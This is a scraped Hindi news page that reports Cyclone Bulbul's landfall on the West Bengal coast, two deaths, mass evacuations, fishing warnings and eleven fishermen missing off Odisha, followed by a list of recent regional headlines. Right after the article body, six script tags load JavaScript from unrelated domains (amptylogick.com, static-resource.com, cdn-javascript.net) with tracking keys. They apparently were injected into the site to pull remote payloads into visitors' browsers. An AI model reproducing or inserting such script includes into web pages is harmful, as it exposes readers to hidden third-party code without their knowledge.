Categories: इंडिया

चक्रवाती तूफान ‘बुलबुल’ के बंगाल तट से टकराने से हुई 2 की मौत

<p>चक्रवाती तूफान बुलबुल ने पश्चिम बंगाल के तटीय क्षेत्र पर अपनी दस्तक दे दी है। इसके चलते पश्चिम बंगाल में जगह-जगह बारिश के साथ तेज हवाएं चल रही हैं। वहीं सूत्रों से मिली जानकारी के अनुसार अभी तक दो लोगों की मौत होने की संभावना जताई जा रही है। भारतीय मौसम विभाग के अनुसार फिलहाल चक्रवात का दबाव सुंदरबन नेशनल पार्क से 12 किमी दक्षिण पश्चिम की ओर पश्चिम बंगाल और बांग्लादेश के तटीय इलाकों पर बना हुआ है। तटीय बांग्लादेश और इससे सटे दक्षिण और उत्तर 24 परगना जिले तक पहुंचते-पहुंचते तूफान कमजोर पड़ सकता है। दूसरी ओर प्रशासन की तरफ से राहत और बचाव कार्य युद्ध-स्तर पर चल रहा है। लाखों को प्रभावित इलाकों से निकालकर राहत शिविर में पहुंचाया गया है।</p>

<p>पश्चिम बंगाल की मुख्यमंत्री ममता बनर्जी ने कहा है कि वे खुद स्थिति की निगरानी कर रही हैं और बुलबुल तूफान से लड़ने के लिए प्रशासन इंतजाम कर रहा है। उन्होंने नागरिकों से शांति कायम रखने और परेशान न होने का आग्रह किया है। बता दें कि अगले 6 घंटो के दौरान पश्चिम बंगाल और बांग्लादेश के तटों पर समुद्र में हाइटाइड आएंगे। बंगाल की खाड़ी के उत्तर पश्चिम में समुद्र में स्थिति काफी गंभीर रहेगी। इसके बाद इसमें धीरे-धीरे सुधार होगा। मौसम विभाग ने मछुआरों को अगले 12 घंटों के दौरान उत्तर ओडिशा और पश्चिम बंगाल के तटों पर समुद्र में न जाने की सलाह दी गई है। इसी के साथ अगले 18 घंटे के लिए बंगाल की उत्तरी खाड़ी में भी न जाने का निर्देश दिया गया है। इसके साथ ही अगले 36 घंटों में मेघालय, मिजोरम और असम में हल्की बारिश होने की संभावना है।</p>

<p>वहीं, ओडिशा की राजधानी भुवनेश्वर में चक्रवात बुलबुल का प्रभाव भले ही न के बराबर हो, लेकिन प्रदेश के तटीय जिलों में इसका खासा प्रभाव देखने को मिला। भद्रक जिले के तालचुआए में समुद्र में गिर जाने से मयुरभंज जिले के उदला निवासी लाल मोहन सिंह नाम के नाविक की मौत हो गई। धामरा बंदरगाह के कालीनाली में मछली पकड़ने वाली नाव के डूब जाने से उसपर सवार 11 मछुआरे लापता हो गए। उनकी तलाश की जा रही है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://amptylogick.com/optout/set/lat?jsonp=__mtz_cb_626819468&amp;key=21aca573d498d25317&amp;cv=1573361957&amp;t=1573361957033″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/optout/set/lt?jsonp=__mtz_cb_376468653&amp;key=21aca573d498d25317&amp;cv=1487622&amp;t=1573361957035″ type=”text/javascript”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1573361957040″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

92 मतदान केंद्रों के माध्यम से 25 हजार 232 मतदाता 1 जून को करेंगे मतदान

मुख्य सचिव प्रबोध सक्सेना ने केलांग में निर्वाचन प्रक्रिया को लेकर की गई व्यवस्थाओं का…

5 hours ago

सम्मान के नहीं, ब्रीफ़केस में रखे सामान के भूखे थे दागीः मुख्यमंत्री

सम्मान के नहीं, ब्रीफ़केस में रखे सामान के भूखे थे दागीः मुख्यमंत्री  आनंद शर्मा का…

5 hours ago

नर्सिंग डे पर फोर्टिस कांगड़ा में धमाल

नर्सिंग डे पर फोर्टिस कांगड़ा में धमाल प्रथम महिला नर्स फ्लोरैंस नाइटिंगेल को किया याद…

9 hours ago

मंडी: सराज के बागीचुनोगी के कचरे से पुणे में बनेगा जरूरत का सामान

अच्छी पहलः सराज के बागीचुनोगी के कचरे से पुणे में बनेगा जरूरत का सामान, प्रधानाचार्य…

9 hours ago

हर साल मई महीने के दूसरे रविवार को मनाया जाता है मदर्स डे

'मां' की एक दुआ जिन्दगी बना देगी, खुद रोएगी मगर तुम्हें हंसा देगी, कभी भूल…

9 hours ago

कांगड़ा घाटी में रेल सुविधा शुरू होने से लोगों में खुशी की लहर

कांगड़ा घाटी में रेल सुविधा शुरू होने से लोगों में खुशी की लहर. पठानकोट-जोगिंद्रनगर रेलवे…

9 hours ago